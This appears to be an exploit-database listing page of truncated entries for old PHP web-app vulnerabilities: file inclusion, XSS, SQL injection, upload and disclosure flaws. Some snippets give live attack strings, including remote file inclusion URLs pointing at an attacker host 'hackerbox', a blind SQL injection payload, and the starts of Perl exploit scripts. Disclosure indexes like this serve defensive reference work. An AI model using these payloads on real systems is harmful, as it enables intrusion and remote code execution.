phpWebLog <= 0.5.3 Arbitrary File Inclusion

No description provided by source. Example: if registerglobals=on and allowurlfopen=on: http://victim/dir/include/init.inc.php?GPATH=http://hackerbox/ http://victim/dir/backend/addons/links/index.php?PATH=http://hackerbox/ milw0rm.com 2005-03-07...

bilboblog 2.1 - Multiple Vulnerabilities

No description provided by source. ------------------------------------------------------------------ Name : Bilboblog 2.1 Multiples Vulnerabilities Description : Bilboblog is a small application of micro-blogging in Php / MySQL Link :...

CVE-2010-1945

Multiple PHP remote file inclusion vulnerabilities in openMairie Openfoncier 2.00, when registerglobals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the pathom parameter to 1 action.class.php, 2 architecte.class.php, 3 avis.class.php, 4 bible.class.php, and 5...

Eleanor CMS Rc5.1 Cross Site Scripting Vulnerability

Exploit for unknown platform in category web applications ==================================================== Eleanor CMS Rc5.1 Cross Site Scripting Vulnerability ==================================================== Topic : Eleanor Rc5.1 Bug tType : Cross Site Scripting Credit : ItSecTeam Remote...

MyFusion 6b Local File Inclusion

┌┌─────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └─────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable...

My Simple Forum 7.1 (LFI) Remote Command Execution Exploit

No description provided by source. !/usr/bin/perl My Simple Forum v7.1 Remote Command Execution Exploit Apache Log Poisoning/Injection Local File Inclusion at /theme/default/index.template.php?action=lf%00 XSS at /theme/default/index.template.php?Name=XSS - This needs Register Globals ON Credits ...

My Simple Forum 7.1 (LFI) Remote Command Execution Exploit

Exploit for unknown platform in category web applications ========================================================== My Simple Forum 7.1 LFI Remote Command Execution Exploit ========================================================== !/usr/bin/perl My Simple Forum v7.1 Remote Command Execution...

PHPLD 3.3 - Blind SQL Injection

PHPLD 3.3 - Blind SQL Injection phpLD 3.3 Blind SQL Injection http://www.phplinkdirectory.com/ magicquotesgpc = Off registerglobals = On Vulnerable: GET http://site/phpld/page.php?name= True Request: validpagename' or 1=1 False Request: validpagename' or 1=0 Try this urlencode: validpagename' or...

CVE-2008-4624

PHP remote file inclusion vulnerability in init.php in Fast Click SQL Lite 1.1.7, when registerglobals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the CFGCDIR parameter...

Softpedia SiteXS CMS 0.1.1 Arbitrary File Upload Vulnerability

No description provided by source. SiteXS CMS Remote File Upload Vulnerability Discovered by : Ciph3r E-Mail : [email protected] CMS: sitexs-0.1.1 CMS All Version Vulnerable Download CMS : http://dfn.dl.sourceforge.net/sourceforge/sitexs/sitexs-0.1.1.tar.gz Sp TANX4 : google.com ;...

seagull-063-xss.txt

fuzion / // /\ / / : //\ /| : : .. / \ | | :: :: \ / | | :| || \ / | | || || |\ / | | || || | / | \ | || || | / /\ \ | || || | / / \ -/ -/ | |// \ --/ \ / / / / \ / \/ Product: Seagull STABLE 0.6.3 http://seagullproject.org/ Vulnerable: Seems that none of the theme css renderers sanatize...

NuSEO PHP Enterprise 1.6 Remote File Inclusion Vulnerability

Exploit for unknown platform in category web applications ============================================================ NuSEO PHP Enterprise 1.6 Remote File Inclusion Vulnerability ============================================================ Vulnerability Type: Remote File Inclusion Vulnerable fil...

PT-2007-5375 · Pluck · Pluck

Name of the Vulnerable Software and Affected Versions: Pluck version 4.3 Description: The issue allows remote attackers to potentially read arbitrary local files via a .. dot dot in the file parameter in the data/inc/theme.php file when register globals is enabled. However, it's noted that the co...

Webfwlog 0.92 - debug.php Remote File Disclosure

Webfwlog 0.92 - debug.php Remote File Disclosure ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + D.Script:ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-stable/All/webfwlog-0.92.tbz + D.Scrpit:http://webfwlog.sourceforge.net/...

Cahier de texte 2.0 (Database Backup/Source Disclosure) Remote Exploit

Exploit for unknown platform in category web applications ====================================================================== Cahier de texte 2.0 Database Backup/Source Disclosure Remote Exploit ====================================================================== !/usr/bin/perl INFORMATIONS...

PT-2006-4905 · Php · Phpprintanalyzer

Name of the Vulnerable Software and Affected Versions: phpPrintAnalyzer version 1.1 Description: A remote file inclusion issue in index.php allows remote attackers to execute arbitrary PHP code when register globals is enabled. This is achieved via a URL in the rep par rapport racine parameter...

PT-2006-3760 · Squirrelmail +1 · Squirrelmail +1

Name of the Vulnerable Software and Affected Versions: SquirrelMail versions 1.4.6 and earlier Description: The issue allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter, under specific conditions where register globals is enabled and magic quotes gpc is...

PT-2006-1804 · Dotproject · Dotproject

Name of the Vulnerable Software and Affected Versions: dotProject versions 2.0.1 and earlier Description: The issue allows remote attackers to execute arbitrary commands via the baseDir parameter in several PHP files, including db adodb.php, db connect.php, session.php, vw usr roles.php,...

PmWiki Multiple Vulnerabilities

This is both a PmWiki and PHP advisory, and works only with registerglobals on. I totally missed the PHP GLOBALS GPC injection vulnerability and rediscovered that by my own if just few month before! arg!. Basically in the worst scenario be are in front of two separate vulnerabilities: one regardi...